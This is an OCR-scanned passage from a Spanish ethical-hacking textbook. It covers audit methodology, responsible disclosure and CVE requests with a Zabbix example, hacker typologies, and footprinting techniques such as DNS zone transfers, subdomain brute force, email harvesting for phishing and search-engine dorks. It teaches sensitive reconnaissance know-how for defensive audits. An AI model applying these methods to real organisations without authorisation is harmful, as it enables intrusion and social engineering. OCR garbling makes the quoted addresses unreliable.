pueda  recuperarse  lo  antes  posible.  Se  entrara  en  detalle  mas  adelante  en  este  tipo  de  prueba 
que  es  siempre  interesante. 

-  El  APT  es  un  proceso  que  puede  ser  lento  en  su  preparacion  y  dedicacion,  pero  es  un 
proceso  que  en  ejecucion  debe  ser  rapido,  ya  que  en  muchos  casos  se  puede  destapar  las 
distintas  pmebas,  por  lo  que  el  conjunto  de  muestra  queda  advertido  de  lo  que  sucede  a  su 
alrededor. 

-  En  las  pruebas  de  fuga  de  infonnacion,  el  auditor  se  encuentra  en  la  empresa  u  organizacion, 
y  sera  en  este  instante  cuando  se  lleven  a  cabo  las  pruebas  para  intentar  sacar  informacion 
del  control  de  la  organizacion.  Mas  adelante,  se  podra  entender  que  es  un  proceso  que  parece 
sencillo,  pero  que  puede  ser  altamente  complejo,  en  funcion  de  las  medidas  de  proteccion  de 
las  organ izaciones. 
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-  La  audilon'a  wireless  o  VOIP,  tienen  como  objetivo  descubrir  fallos  de  seguridad  o 
configuracion  en  los  protocolos  utilizados  para  implantar  estas  tecnologias.  El  auditor  llevara 
a  cabo  pruebas  con  el  fin  de  detectar  en'ores  de  configuracion,  protocolos  inseguros,  estudiar 
el  entorno  y  la  viabilidad  de  espionaje  en  la  comunicacion,  etcetera,  Estas  auditorias,  a  dia 
de  hoy,  son  bastante  procedimentales,  aunque  siempre  hay  pequenos  trucos  que  pueden  dotar 
al  auditor  de  alguna  prueba  diferente  e  interesante,  desde  el  punto  de  vista  de  la  seguridad. 


Revision  del  proceso:  Medidas  correctoras 

Una  vez  los  ataques  han  ido  desvelando  los  fallos  de  seguridad  en  las  distintas  auditorias,  el  auditor 
debe  informar  y  recopilar  unas  medidas  correctoras  que  solventen  los  problemas  de  seguridad 
descubiertos.  No  sera  el  auditor  quien  solvente  estos  fallos  de  seguridad,  pero  si  sera  el  que 
recomiende  la  aplicacion  de  diferentes  tareas  para  mitigar  o  solventarlos. 

En  este  libro  se  estudiaran  distintas  medidas  coiTectoras  cada  una  enfocada  a  su  auditoria  pertinente. 
Realmente  se  puede  visualizar  como  una  parte  teorica,  ya  que  el  auditor  conoce  en  la  mayoria  de  las 
ocasiones  que  si  una  prueba  tiene  exito,  es  decir  detecta  una  vulnerabilidad,  ciial  sera  la  medida  que 
conige  dicho  fallo. 

Una  de  las  medidas  que  se  suelen  llevar  a  cabo  es  la  de  otorgar  a  la  empresa  de  iin  tiempo  determinado 
para  solventar  el  fallo  encontrado,  y  poco  tiempo  despues  llevar  a  cabo  alguna  Jornada  donde  se 
realicen  pruebas  definidas  para  comprobar  y  verificar  que  se  ha  solventado  el  fallo  descubierto. 


Documentacion 

Toda  prueba  debera  estar  correctamente  documentada,  en  dos  tipos  de  infonnes,  el  primero  a  modo 
ejecutivo  informando  de  las  observaciones  mas  destacadas,  y  el  segundo  a  modo  tccnico  detallando 
todo  el  proceso  efectuado  en  la  organizacion  y  las  pruebas  realizadas. 

Es  altamente  recomendable  que  el  auditor  documente  desde  cl  primer  dia  las  pruebas  y  resultados 
que  se  van  obteniendo,  tanto  para  que  pueda  realizar  su  trabajo  correctamente,  como  porque  despues 
el  informe  sc  realizara  en  un  periodo  de  tiempo  menor. 

En  el  capitulo  dedicado  a  la  documentacion  se  podran  estudiar  distintos  tipos  de  informes  reales  que 
pueden  ayudar  a  entender  mejor  esta  parte  de  la  metodologia. 


Interlocutores  y  almacenamiento  de  la  informacion 

Es  importante  que  la  comunicacion  con  el  cliente  siempre  vaya  protegida,  en  funcion  del  ambito 
en  el  que  dicha  comunicacion  se  produzca.  Todo  intercambio  digital  de  documentos,  como  ya  se  ha 
mencionado  anteriormente,  deberia  realizarse  a  traves  de  medios  seguros. 

El  ejemplo  tipico  es  el  intercambio  a  traves  del  correo  electronico,  el  ciial  deberia  ser  protegido  con 
claves  PGP,  para  otorgar  confidencialidad  e  integi*idad.  Ademas,  el  uso  de  certificados  digitales  seria 
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adecuado  para  que  el  receptor  del  mensaje  pueda  autenticar  la  identidad  de  quien  envia  el  correo 
electronico. 

Otro  aspecto  importante  es  como  el  grupo  de  auditores  debe  proteger  la  infonnacion  y  documentacion 
que  puede  ser  recibida  de  paite  de  la  empresa  contratante.  Tanto  esta  informacion,  como  la  que  los 
auditores  generan  debera  ser  almacenada  de  forma  segura.  a  traves  de  un  sistema  de  autenticacion  y 
control  de  accesos,  y  protegiendo  la  confidencialidad  de  esta  infonnacion  mediante  el  uso  de  cifrado 
robusto.  Esta  informacion  debe  ser  almacenada  durante  una  vigencia  maxima,  la  ciial  sera  acordada 
con  el  cliente,  pero  es  comun  que  al  finalizar  el  trabajo  se  deba  destruir  de  fonna  segura  toda  la 
informacion. 


6.Publicaci6n  de  una  vulnerabilidad 

Cuando  un  grupo  de  auditores  trabajan  en  un  proceso  de  Ethical  Hacking  se  pueden  encontrar 
vulnerabilidades  que  antes  otros  no  hayan  encontrado,  por  esta  razon  es  importante  conocer  el 
procedimiento  para  publicar  la  vulnerabilidad  encontrada.  A  traves  del  MITRE  se  podra  registrar  un 
CVE  para  la  nueva  vulnerabilidad  encontrada  por  el  equipo,  o  por  algun  miembro  en  concreto,  para 
su  posterior  descripcion  y  liberacion. 

Existen  dos  modalidades  claramente  diferenciadas  cuando  se  descubre  una  nueva  vulnerabilidad, 
y  son.  en  primer  lugar  se  envia  al  fabricante  del  producto  para  que  pueda  tomar  medidas  y,  tras 
corregir  la  vulnerabilidad,  liberar  la  informacion  mediante  un  CVE.  En  segundo  lugar,  realizar  un 
EuU  Disclosure,  haciendo  saber  a  la  comunidad  el  fallo  de  seguridad  y  como  aprovecharse  de  el. 

Siempre  hay  que  ir  con  la  etica  por  delante,  por  lo  que,  siempre  sc  debe  elegir  la  primera  via 
comentada  anteriormente.  Solo  en  el  caso  de  que  el  fabricante  ignore  las  peticiones  de  parte  del 
equipo,  seria  opcion  realizar  F////  Disclosure. 


Reservar  CVE 

La  pcticion  de  reserva  de  un  CVE  se  realizara  a  traves  del  coraeo  electronico  cve-asslgn(cipnifre.org. 
En  esta  peticion  el  usuario  debe  especificar  que  ha  encontrado  una  vulnerabilidad  y  que  requiere  un 
CVE,  el  dial  no  sera  definitivo,  ya  que  si  posteriormente  en  el  email  que  se  enviara  con  los  detalles 
lecnicos  no  es  aceptado,  el  CVE  podra  relevarse  para  otro  usuario.  De  todos  modos  hay  que  tener  en 
cuenta  que  el  tiempo  que  se  tendra  un  CVE  reservado  es  alto. 


Detalles  tecnicos  para  CVE 

Una  vez  se  reserva  un  CVE,  se  debe  exponer  los  detalles  tecnicos  de  la  vulnerabilidad,  a  que  versiones 
afecta,  y  que  beneficio  se  obtiene  de  la  explotacion  de  la  vulnerabilidad.  No  debe  ser  un  documento 
excesivamente  complejo  o  tecnico,  y  si  una  pequena  guia  para  explicar  el  agujero  de  seguridad,  y 
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como  se  puede  reproducir.  Tras  la  generacion  del  escrilo,  se  debe  enviar  a  la  direccion  de  correo 
electronico  cve@mitre.org.  El  envio  a  esta  direccion  se  llevara  a  cabo  en  caso  de  que  el  fabricante 
haya  ignorado  los  contactos  con  el  equipo  de  auditoria. 


Ejemplo  real:  CVE-2013-5572 

Este  ejemplo  que  se  presenta  a  continuacion  con'esponde  con  una  vulnerabilidad  encontrada  por  el 
equipo  de  Infonuatica  64  a  finales  del  ano  2012  y  principios  del  ano  2013.  Este  ejemplo  muestra  un 
Full  Disclosure^  el  cual  no  debe  ser  el  primer  camino,  pero  que  tampoco  debe  ser  descartado. 

En  primer  lugar  se  llevo  a  cabo  el  envio  de  la  peticion  de  CVE  al  MITRE,  tal  y  como  se  puede 
visualizar  en  el  siguiente  correo  electronico. 

cvc-assign6f  niiirc.org 

Hello. 

1  wanted  to  reque.si  a  CVE-ID.  We  have  discovered  a  vulnerability  in  the  software  Zabbix.  Wc  want  to  expose  security  problems  found. 
Thank  you. 

Fig.  1.03:  Peticion  de  CVE  al  MITRE. 

Una  vez  se  proporciona  el  CVE  al  usuario,  este  prepara  el  detalle  tecnico  para  enviar.  A  continuacion 
se  puede  visualizar  la  contestacion  del  MITRE  a  la  peticion  de  reserva. 

— BEGIN  PGP  SIGNED  MESSAGE — 

Hash:  SHA1 

>1  wanted  to  request  a  CVE-ID.  We  have  discovered  a  vulnerability  in 
>the  software  Zabbix.  We  want  to  expose  security  problems  found. 

Use  CVE-2013-5572. 

CVE  assignment  team.  MITRE  CVE  Numbering  Authority 
M/S  M300 

202  Burlington  Road.  Bedford.  MA  01730  USA 

[  PGP  key  available  through  htlD:/.^cve-mitre.orQ-c.ve/reQuest  id.htrn]  ] 

— BEGIN  PGP  SIGNATURE — 

Version:  GnuPG  v1.4.14  (SunOS) 

iQEcBAEBAgAGBQJSH1SDAAoJEGvefgSNfHMdZfkHy2fkfcr8Xo7wEsS2F9dbu2N3 


Fig.  1 .04:  Respiiesta  del  MITRE  otorgando  un  CVE. 
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Como  se  ha  mencionado  anted onnente,  la  preparacion  de  la  explicacion  de  la  vulnerabilidad  y 
aprovechamiento  no  debe  ser  muy  extensa.  Es  preferible  que  se  recoja  la  explicacion  de  la 
vulnerabilidad,  como  se  puede  aprovechar  y  el  impacto  o  efecto  que  esta  tiene  en  su  entorno,  es 
decir,  explicacion  clara  y  sencilla. 

Date:  Wed,  25  Sep  2013  12:22:08  +0200 


Hello, 

I  attach  information  about  CVE-2013-5572  (Zabbix  leakage  password). 

cBEiBafBaBaiacataaenaBaeaamaieaBaBtDaaaBBiBaiBaisBtsBaeaaansiaaisassBBBMiaHiiaetaaBtaaa 

ID:  CVE-2013-5572 

Title:  Vulnerability  Leak  Password  Zabbix 

Date:  23/08/2013 

Status :  Not  Solved 

Scope:  Privilege  Elevation 

Author:  Chema  Alonso,  Pablo  Gonzalez,  German  Sanchez 

BBeaaBBBBfllBBaBaaBBBBBBaBBaBaBBBaBBCaBaBBBOBBBBBBaaSBBBiaBBBSBBta— BBB 


There  is  a  security  bug  on  Zabbix  2.0.5.  This  bug  allows  to  see  a  zabbix 
user's  password,  if  this  user  has  a  open  session  in  management  console. 
Potentially,  This  vulnerability  allows  to  carry  on  an  privilege  elevation 
affecting  the  way  Active  Directory  resources  on  Enterprise  Network  are 
accessed. 


Fig.  1 .05:  Cabccera  dc  la  explicacion  de  la  vulnerabilidad  CVE-201 3-5572. 

Por  Giro  lado,  para  poder  realizar  un  Full  Disclosure,  el  usuario  se  debe  dar  de  alia  en  la  lista.  Para 
posleriormente,  enviar  un  correo  a  la  lista  con  el  detalle  tecnico  de  la  vulnerabilidad.  como  se  ha 
podido  visualizar  en  la  imagen. 

Send  Full-Disclosure  mailing  list  submissions  to 
full-disclosure@lists.QrQk..orQ.uk 

To  subscribe  or  unsubscribe  via  the  World  Wide  Web.  visit 
httDs://lists.qrok.QrQ.uk'mailman;iistinfo.>'fuH-disclQSure 

or,  via  email,  send  a  message  with  subject  or  body  ’help’  to 
full-disclosure-reQUest@listsqrok.orQ.uk 

You  can  reach  the  person  managing  the  list  at 
full-disclosure-Qwner@lists. grok. pro,  uk 


Fig.  1.06:  Suscripcion  a  la  lista  para  su  posterior  uso. 
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Por  ultimo,  es  cuesiion  de  horas  o  dias  que  fuentes  acreditadas  reconozcan  la  vulnerabilidad.  si  el 
fabricante  no  lo  ha  hecho  antes.  En  ese  instante  el  MITRE  validara  la  vulnerabilidad  y  otorgara  el 
CVE  como  final  a  quien  lo  registro.  En  la  imagen  de  la  siguiente  pagina  se  puede  visualizar  como 
el  MITRE  valida  y  presenta  la  vulnerabilidad  bajo  ese  identificador,  indicando  el  enlace  de  quien  lo 
ha  validado. 


fig.  1.07:  CVE-201 3-5572. 


T.Nuevas  tendencias 

Que  la  seguriclad  infonnatica  avanza  a  gran  velocidad  es  algo  sabido  por  todos,  cada  dia  salen 
niievas  vulnerabilidades,  niievas  fonnas  de  atacar,  nuevas  tecnologias  que  deben  ser  audiladas, 
nucvos  sistemas  mas  complejos  con  probabilidad  de  tener  mas  tallos.  Por  esta  razon  investigadoies 
en  segLiridad  informatica  estudian  nuevas  formulas  con  las  que  mejorar  las  vias  de  deteccion  de 
vulnerabilidades  y  correccion  de  estas. 


Pentesting  by  Design 

Como  se  ha  mencionado  anteriormente,  en  el  dia  a  dia  aparecen  nuevas  vulneiabilidades,  y  las 
empresas  quedan  expuestas  a  estas.  Siempre  aparecen  vulnerabilidades  que  ayudaran  a  pieparar 
ataques  contra  sistemas,  y  se  podra  demostrar  que  se  ha  conseguido  entrar  al  sistema  o  a  partes 
de  este.  Historicamente  ban  existido  graves  incidentes  de  seguridad  que  han  sacudido  a  grandes 
companias,  organizaciones,  gobiemos,  etcetera. 

El  pentesting  bv  design  es  un  nuevo  modelo  o  tendencia  el  cual  responde  a  la  siguiente  cuestion,  ^Por 
que  en  la  mayoria  de  las  ocasiones  que  se  realiza  una  auditoria  de  seguridad  externa  se  descubren 
fallos  de  seguridad  graves?  El  pentesting  no  deberia  ser  un  proceso  puntual,  deberia  ser  un  proceso 
continuo  que  se  ejecute  constantemente  sobre  el  ciclo  de  vida  del  sistema.  Como  indica  el  eslogan 
del  modelo:  un  servicio  de  atcique  24x7  durante  la  vida  del  sistema. 
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Un  atacante  puede  realizar  distintos  ataques  cualquier  dia  sobre  los  sistemas  de  una  empresa,  por  lo 
que  se  puede  decir  que  los  malos  atacan  muchisimas  mas  veces  que  un  auditor.  Este  hecho  hace  que 
el  pentesting  by  design  proporcione  soporte  desde  la  fase  de  diseno  de  los  sistemas.  Las  empresas  de 
seguridad  que  realizan  auditorias  estan  moviendo  el  modelo  de  negocio  y  utilizando  herramientas 
de  automatizacion  para  llevar  a  cabo  las  auditorias  constantemente  bajo  el  modelo  expuesio  en  este 
apartado.  De  esta  via  los  atacantes  y  los  auditores  se  encuentran  casi  en  un  autentico  combate  en 
igualdad  de  condiciones. 

Esta  nueva  tendencia  no  implica  que  si  la  empresa  dispone  de  un  equipo  de  pentesting  intemo  se 
deba  deshacer  de  el.  Ambas  partes  son  totalmente  compatibles,  e  incluso,  es  una  buena  suma  de 
soluciones. 

Los  sistemas  deberan  estar  disehados  para  soportar  las  pruebas  constantemente,  es  decir  24x7.  Si 
no  es  asi,  los  atacantes  ya  tienen  mas  posibilidades  de  conseguir  los  logros,  antes  que  los  auditores 
encuentren  los  fallos  de  seguridad. 

El  pentesting  by  design  necesita  un  dimensionamiento  de  la  memoria,  el  almacenamiento  y  el  ancho 
de  banda  en  las  comunicacioncs  en  los  sistemas  disenados  a  priori  para  dar  calidad  de  servicio  a 
los  Lisuarios,  mas  un  porcentaje  destinado  al  ataque  continuo  de  los  atacantes,  mas  un  porcentaje 
necesario  para  que  los  auditores  puedan  realizar  el  proceso  de  pentesting  continuo  desde  el  primer 
dia.  Como  se  puede  visualizar  existen  tres  factores  clave  en  el  diseno  de  los  sistemas.  A  dia  de  hoy 
no  existen  muchos  organismos,  empresas  o  gobiernos  preparados  para  ello,  pero  la  tendencia  es  la 
explicada  en  este  apartado. 

Todo  esto  no  es  suficiente  para  estar  cien  por  cien  seguros,  pero  pennile  tenor  las  mismas  oportunidades 
quo  los  malos,  en  la  deteccion  y  cxplotacion  de  vulnerabilidades.  Una  vez  el  pentesting  by  design 
detecte  los  fallos  de  seguridad  se  deberan  realizar  los  deberes  de  la  fase  de  gestion  de  la  seguridad 
en  los  sistemas. 


8.  Atacantes  de  sombrero 

El  Ethical  Hacking  es  llevado  a  cabo  por  los  conocidos  hackers  de  sombrero  bianco  o  white  hat.  El 
hacker  de  sombrero  bianco  es  una  persona  que  utiliza  el  hacking  de  manera  etica.  con  el  objetivo  de 
asegurar  y  proteger  los  sistemas  de  informacion  y  comunicaciones.  Estas  personas  suelen  trabajar 
en  empresas  de  seguridad  informatica. 

Por  otro  lado,  un  hacker  de  sombrero  negro  o  black  hat  se  refiere  a  una  persona  que  utiliza  el 
hacking  de  manera  fraudulenta  o  buscando  el  beneficio  propio.  Los  hackers  de  sombrero  negro 
caen  en  acciones  ilegales,  las  consecuencias  pueden  ser  graves  y  acabar  en  ados  juridicos.  Estos 
tipos  de  hackers  son  conocidos  tambien  como  crackers,  los  cuales  muestran  habilidades  especiales 
rompiendo  sistemas  de  seguridad,  denegando  servicios,  accediendo  a  zonas  privadas  o  restringidas, 
infectando  redes,  entre  otras  acciones,  gracias  a  sus  destrezas  en  el  mundo  del  hacking. 
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Otro  tennino  dentro  del  tniindo  del  hacking  y  del  Ethical  Hacking  es  el  de  samurai.  Esle  termino  se 
coiresponde  con  alguien  contratado  para  investigar  fallos  de  seguridad,  los  cuales  investigan  casos 
sobre  los  derechos  de  privacidad.  Los  samurai  son  totalmente  contraries  a  los  crackers  y  otros  tipos 
de  vandalos  de  la  infonnatica. 

El  phreaker  es  una  persona  con  grandes  conocimientos  en  telefonos  modulares  como  en  dispositivos 
moviles. 

El  wannabe  son  aquellos  usuarios  a  los  qiie  les  interesa  el  hacking  y  se  encuentran  en  tase  de 
aprendizaje.  El  wannabe  esta  considerado  un  hacker  un  potencia,  mientras  siga  aprendiendo  y 
estudiando. 

El  lanmier  o  script-kiddie  se  asocia  a  una  persona  con  falta  de  habilidades  tecnicas  o  conocimientos 
en  general.  En  otras  palabras  no  es  un  usuario  competente  en  la  materia,  el  cual  pretende  obtener 
un  beneficio  del  hacking  sin  disponer  de  los  conocimientos  necesarios,  como  se  ha  comentado 
anteriormente.  Este  tipo  de  usuarios  realiza  busquedas  de  aplicaciones  o  heiTamientas  de 
intrusion  o  vandal ismo  infonnatico  con  el  objetivo  de  realizar  una  tarea  maliciosa,  sin  entender 
su  funcionam lento  o  las  acciones  que  puede  llegar  a  lograr.  En  ciertas  ocasiones  presumen  de 
conocimientos  o  habilidades  que  no  poseen,  ademas,  no  disponen  de  etica  a  la  hora  de  llevar  a  cabo 
las  tecnicas  de  hacking. 

Un  newbie  es  un  termino  utilizado  para  referenda  a  un  novato  en  el  area  de  la  seguridad  informatica. 
En  esta  area  se  presupone  que  no  dispondra  de  muchos  conocimientos  en  esta  tematica. 


Capitido  11.  La  informacion  es  poder 
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Capitulo  II 

La  informacion  es  poder 


l.Procesos  asociados 

Hoy  en  dia  es  conocido  por  todos  que  la  infonnacion  es  poder.  Los  casos  de  la  NS.4  y  otras  agendas 
de  inteligencia  reflejan  en  la  sociedad  que  cuanto  mas  se  sepa  de  las  conductas,  gustos,  habitos  de 
los  ciudadanos  mayor  control  se  puede  tener  sobre  ellos. 

En  el  ambito  de  la  seguridad  ocuiTe  algo  similar,  cuanto  mas  se  conozca  sobre  el  objetivo  mis 
posibilidades  se  tendran  para  encontrar  una  via  por  la  que  tener  exito  en  un  posible  ataque. 

Existen  diversas  maneras  para  conocer  infonnacion  sobre  los  objetivos,  aunque  tambien  dependera 
de  la  via  o  forma  en  la  que  se  consigan.  Se  podria  utilizar  a  terceros  para  obtener  informacion  que 
ellos  conocen  del  objetivo  real,  por  lo  que  no  se  accederia  directaniente  a  c.ste.  Por  otro  lado.  se 
puede  ir  dircctamente  al  objetivo  para  conseguir  la  informacion  requerida. 

Se  puede  entender  la  recogida  de  informacion  como  una  etapa  dt  footpriiUingy  otra  dtfingerprinting. 
E\  foo/prinling  consiste  en  la  busqueda  de  cualquier  tipo  de  informacion  publica,  la  cual  puede 
consegLiirse  con  el  desconocimiento  del  objetivo  o  porque  haya  sido  publicada  a  conciencia.  ^.Que 
puede  interesar  de  todo  esto?  En  este  proceso  se  puede  buscar  y  obtener  desde  direcciones  IP  de 
la  organizacion  objetivo,  nombres  y  direcciones  IP  de  servidores  intemos,  cuentas  de  correos 
electronicos  de  los  usuarios  de  la  organizacion,  nombres  de  maquinas,  informacion  de  los  dominios. 
impresoras,  rutas  intemas,  metadatos,  etcetera.  Cualquier  dato  que  pueda  ayudar  a  conocer  mejor  la 
organizacion  objetivo  puede  ser  interesante  en  un  test  de  intrusion. 

E.\ fingerprinting  consiste  en  analizar  las  huellas  que  dejan  las  maquinas,  por  ejemplo  para  obtener  el 
sisteina  operativo,  la  version  de  una  aplicacion,  puertos  abiertos,  existencia  firewalls,  etcetera.  Las 
huellas  se  detectan  a  traves  del  analisis  de  las  conexiones  de  red  de  estas  maquinas.  por  ejemplo,  cn 
el  tipo  y  forma  de  las  respuestas  al  establecimiento  de  las  conexiones.  Este  proceso  es  llevado  a  cabo 
a  traves  de  2  maneras,  de  forma  activa,  es  decir,  las  heiTamientas  envian  paquetes  esperando  una 
respuesta  yen  funcion  de  dicha  respuesta  se  puede  inferir  ciertas  propiedades  de  ciertas  tecnologias 
concretas.  Se  utiliza  una  base  de  datos  donde  se  va  comparando  para  obtener  la  realidad.  La  otra  via 
es  la  pasiva,  donde  la  herramienta  escucha  el  trafico  para  identificar  maquinas  que  actiian  en  la  red 
comparando  las  respuestas  pero  sin  llegar  a  interactuar  en  la  red. 
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Footprinting 

Como  se  ha  mencionado  anteriormente,  el  footprinting  es  una  etapa,  la  primera  de  un  test  de 
intmsion,  en  la  qiie  el  atacante  recoge  informacion  de  todo  tipo  sobre  el  objetivo.  Sii  fiiente  es  toda 
Internet,  por  lo  que  se  puede  encontrar  gran  cantidad  de  informacion. 

Despues  hay  que  filtrar  toda  la  informacion  para  quedarse  con  lo  mas  impoitante,  pero  un  proceso 
como  este  es  importante,  ya  que  seguramcnte  descubrira  activos  de  la  organizacion  en  Internet,  los 
CLiales  se  pueden  convertir  en  posibles  vectores  de  ataque. 

El  primer  paso  en  q\  footprinting  es  seleccionar  el  objetivo  sobre  el  que  se  llevara  a  cabo  el  proceso 
de  obtencion  de  informacion  global.  A  continuacion  se  exponen  diversas  vias  y  maneras  con  las  que 
poder  obtener  informacion  a  priori: 

Visitar  el  o  los  sitios  web  de  la  organizacion,  servicios  y  aplicaciones  con  el  fin  de 
encontrar  errores  y  conocer  la  superficie  de  infonnacion  que  tiene  el  objetivo. 

-  Busqueda  de  enlaces  mediante  motores  de  busqueda,  como  Google  o  Bing,  fichero 
Robots,  fxt,  eiTores  en  llamadas,  etcetera. 

Algo  interesante  es  descargartodos  los  sitios  web  de  la  organizacion  para  poder  estudiarlos 
y  descubrir  enlaces  o  textos  que  pueden  haberse  quedado  en  las  propias  paginas. 

-  Por  SLipuesto  se  debe  utilizar  los  Dorks  para  preguntar  a  los  motores  de  busqueda.  Esto 
puede  ser  automatizado  con  herramientas  como  FOCA.  Es  impoitante  recabar  la  maxima 
informacion  posible  sobre  el  dominio,  para  despues  ir  afinando  las  busquedas  con  los  nicks 
que  el  auditor  puede  conocer.  Mas  adelante  se  veran  diferentes  verbos  para  obtener  inejores 
resultados  en  busquedas  con  estas  tecnicas,  gracias  a  la  GIIDB,  Google  Hacking  Database. 

-  Las  versiones  anteriores  de  paginas  web  tambien  deben  ser  consultadas,  por  ejemplo 
mediante  el  uso  de  Archieve.org. 

-  ^,C6mo  saber  el  tamaho  aproximado  de  la  organizacion?  Es  importante  listar  los  dominios 
y  subdominios  de  esta.  Toda  la  informacion  que  se  pueda  obtener  de  esto  es  intomiacion 
crucial,  por  ejemplo  listar  el  maximo  de  direcciones  IP,  con  lo  que  se  podria  tener  una  idea 
aproximada  del  numero  de  maquinas  de  las  que  consta  la  organizacion. 

El  estudio  de  los  metadatos  de  los  documentos  piiblicos  de  una  organizacion  es  algo 
importante,  ya  que  gracias  a  estos,  se  puede  conocer  datos  de  interes  de  una  organizacion. 
En  los  metadatos  se  puede  conocer  desde  emails,  software,  usuarios,  impresoras,  etcetera. 
Cuantos  mas  metadatos  se  conozcan  mas  inferencia  se  puede  realizar,  y  en  algunos  casos 
pueden  provocar  fugas  de  informacion  importantes,  como  por  ejemplo  infonnacion  sobre 
conexiones  LDAP. 

-  Apoyarse  en  servicios  como  el  DNS  para  saber  por  donde  navegan  los  emplcados  de 
la  organizacion.  Esto  puede  ser  realmente  util  para  conocer  aplicaciones  que  pueden  ser 
vulnerables  a  tecnicas  de  Evilgracle.  Por  ejemplo,  si  el  auditor  descubre  que  el  DNS  de  la 
organizacion  es  vulnerable  a  DNS  Cache  Snooping,  puede  preguntar  al  servidor  por  dominios 
que  utilizan  las  aplicaciones  en  sus  actualizaciones.  Los  dominios  por  los  que  preguntaria 
serian  vulnerables  a  la  tecnica  de  Evilgracle. 
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-  El  DNS y  el  seiwidor  de  correo  pueden  ayudar  a  obtener  informacion  sobre  la  organizacion. 
Otros  ejemplos  son  la  transferencia  de  zona  con  la  que  se  puede  obtener  un  mapa  de  maquinas 
jugoso.  La  transferencia  de  zona  puede  realizarse  debido  a  cuatro  fomias,  y  el  error  consiste 
en  que  el  servidor  DNS  esta  confiando  en  que  quien  pide  tiene  acceso  a  dicha  informacion. 
Se  puede  obtener,  como  se  ha  mencionado  anteriormente,  un  mapa  de  maquinas  externas.  e 
incluso  direcciones  IP  de  maquinas  de  la  red  interna,  lo  ciial  penuite  al  auditor  conocer  la 
infraestructura  interna  o  parte  de  el  la.  Por  otro  lado  se  puede  realizar  fuerza  bruta  sobre  el 
servidor  DNS  con  el  fin  de  conocer  nuevos  subdominios  que  pueden  no  haberse  conocido 
antes.  No  es  un  proceso  rapido,  pero  con  un  diccionario  adecuado  se  puede  conseguir  un 
buen  resultado.  Tambien  se  pueden  realizar  resoluciones  inversas,  es  decir,  partiendo  de  una 
direccion  IP  conseguir  un  dominio  objetivo. 

-  Conocer  infonnacion  a  traves  del  uso  de  servicios  web  puede  ayudar  a  conocer  datos  de 
los  dominios  de  la  empresa  objetivo  que  pueden  ser  relevantes  posteriormente.  Por  ejemplo, 
conocer  direcciones  IP,  subdominios.  registradores,  localizacion  en  mapas,  servicios  con 
los  que  se  relacionan,  etcetera,  son  .solo  algunos  datos  que  se  pueden  conocer  gracias  los 
servicios  web  como;  netcraft,  cuwhois,  I23people,  iptools,  etcetera. 

Comprobacion  de  la  exislencia  de  lo  denominado  como  hosting  compartido.  Esto  cs  un 
valor  aiiadido  importante,  ya  que  la  seguridad  del  servidor  puede  radical*  en  el  dominio  mas 
debil.  Para  esto  se  puede  utilizar  el  verbo  ip  en  el  motor  de  busqueda  Bing,  con  el  que  dandole 
una  direccion  IP  se  puede  obtener  un  listado  de  dominios  que  se  encuentran  indexados  bajo 
esa  direccion  IP.  Otra  forma  de  llevar  a  cabo  esto  puede  scr  mediante  el  servicio  serversnijf 
disponible  en  Internet. 

La  obtencion  de  emails  es  algo  importante,  ya  que  mas  adelante  se  puede  llevar  a  cabo 
ataques  de  ingenieria  social, /;/?/.s7?/V?g,  o  incluso  el  comienzo  de  un  APT.  Existen  herramientas 
las  cuales  pasandoles  el  nombre  de  dominio  realizan  busqueda  de  los  emails  de  los  empleados 
de  la  organizacion  por  Internet.  Otras  tools  lo  que  pemiiten  es  vcrificar  si  la  cuenta  de 
correo  ha  sido  comprometida  y  sus  crcdcnciales  se  encuentran  en  algunas  de  las  bases  de 
datos  conocidas.  Con  Maltego  se  puede  conseguir  que  a  partir  de  una  direccion  de  coireo 
electron ico  conocer  en  que  sitios  web  aparece,  y  obtener  mas  cuentas  de  correo  electron ico. 

Analisis  de  la  informacion 

-  Despues  de  haber  recolectado  el  maximo  posible  de  informacion  se  debe  analizar  y 
entender  qud  datos  son  los  importantes  en  el  comienzo  de  un  pentesting.  A  continuacion  sc 
exponen  los  elementos  que  se  pueden  difercnciar  del  rcsto  de  la  informacion  por  tener  un 
valor  anadido  para  el  pentester: 

-  Nombres  de  empleados.  Esta  informacion  puede  ser  valida  mas  adelante.  ya  que  con  ella 
se  pueden  hacer  combinaciones  para  lograr  un  nombre  de  usuario,  un  correo  electron  ico. 
realizacion  de  tecnicas  de  ingenieria  social  con  dicha  persona,  o  incluso  tecnicas  de  fuerza 
bruta  sobre  un  usuario  y  contrasena. 

-  Datos  de  la  Intranet.  Estos  datos  pueden  ayudar  al  auditor  a  inferir  la  topologia  de  la  red 
interna,  asi  como  los  elementos  de  seguridad  que  pueden  encontrarse  proiegiendo  los  activos 
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de  la  organizacion.  Hay  qiie  tener  en  ciienta  que  en  este  tipo  de  informacion  puede  existir 
dates  sobre  elementos  como  balanceadores  de  cdiXgdi,  firewalls,  IDS,  etcetera. 

Ademas,  de  la  Intranet  se  puede  conseguir  los  siguientes  dates: 

o  Carpeta  o  archive  oculte,  el  cual  puede  preporcionar  infonnacion  sensible, 
o  Telefones  y  direcciones  cen  las  que  se  puede  realizar  ingenieria  social, 
o  Dates  personales. 
o  Contrasehas. 

o  Protocolos,  arquitecturas  de  red,  reglas  de  elementos  de  seguridad,  etcetera. 

Versiones  de  software  einbebido  en  archives.  Esta  infonnacion  vale  paia  saber  que  tipo 
de  software  y  version  se  utiliza,  per  lo  que  se  puede  saber  si  existen  vulnerabilidades.  Esto  es 
extensible  a  los  sistemas  operatives. 

-  Piintos  extenios,  como  ISP,  donde  se  pueda  interceptar  comunicaciones.  Si  en  el  canal 
existen  puntos  no  seguros,  se  podria  interceptar  la  comunicacion  y  obtener  infonnacion 
sensible. 

Documentacion  inlema  que  por  error  fue  publicada.  Gracias  a  los  buscadores  se  puede 
cncontrar  indexado  todo  tipo  de  infonnacion  hasta  procedimientos  internos  de  seguridad  de 
una  empresa. 

-  Cuentas  de  emails. 

-  Puerlos  abiertos  en  maquinas  de  la  organizacion,  por  ejemplo  inediante  el  uso  del  truco 
de  la  barra.  Con  esta  informacion  se  podra  averiguar  que  servicio  hay  detras  de  dicho  pueilo, 
version  de  softivare,  etcetera. 

-  Maquinas  y  servicios  que  se  ban  ido  encontrando  a  traves  de  todo  el  proceso  de 
footprinting. 

PoC:  Shared  hosting 

En  esta  prueba  de  concepto  se  va  a  mostrar  el  peligro  de  los  shared  hosting,  y  como  puede  ser 
inuy  util  detectarlos  en  los  siiios  web  pertenecientes  a  la  empresa  objetivo.  Hay  que  recordar  que 
